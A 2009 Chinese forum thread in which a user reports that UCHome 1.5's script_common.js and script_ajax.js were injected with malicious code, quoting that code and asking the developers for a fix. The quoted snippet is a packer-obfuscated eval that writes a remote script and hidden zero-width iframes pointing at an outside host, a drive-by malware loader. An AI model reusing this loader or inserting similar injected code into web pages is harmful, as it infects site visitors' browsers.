uchome1.5程序发现大漏洞，js会被挂马

kisshaha · 发表于 2009-8-29 23:26:04

本帖最后由 kisshaha 于 2009-8-29 23:28 编辑

if(document.cookie.indexOf('hello')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='hello=Yes;path=/;expires='+expires.toGMTString()
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('5.l(\'<h f=b i=8://m.n.6.4/a/j.d></h><9 7=0 k=1 i="8://m.n.6.4/a/e.c?2"></9><9 7=0 k=1 i="8://m.n.6.4/a/g.c?3"></9>\')',62,24,'|100|123|456|cn|document|gov|height|http|iframe|images|javascript|jpg|js|kiss|language|miss|script|src|ubb|width|writeln|www|xcrsrc'.split('|'),0,{}));}

复制代码

uchome1.5：source目录下的script_common.js和script_ajax.js 会被注入这段代码，目前暂时不想升级到2.0，望官方赶紧给提供修正方法

认真的狼 · 发表于 2009-8-30 01:43:51

那你就升级到2.0吧

kisshaha · 发表于 2009-8-30 19:39:00

顶一下，官方有没有人负责这个啊

8int · 发表于 2009-8-30 22:32:17

呵呵 ((em:11))

		自动登录	找回密码
密码			立即注册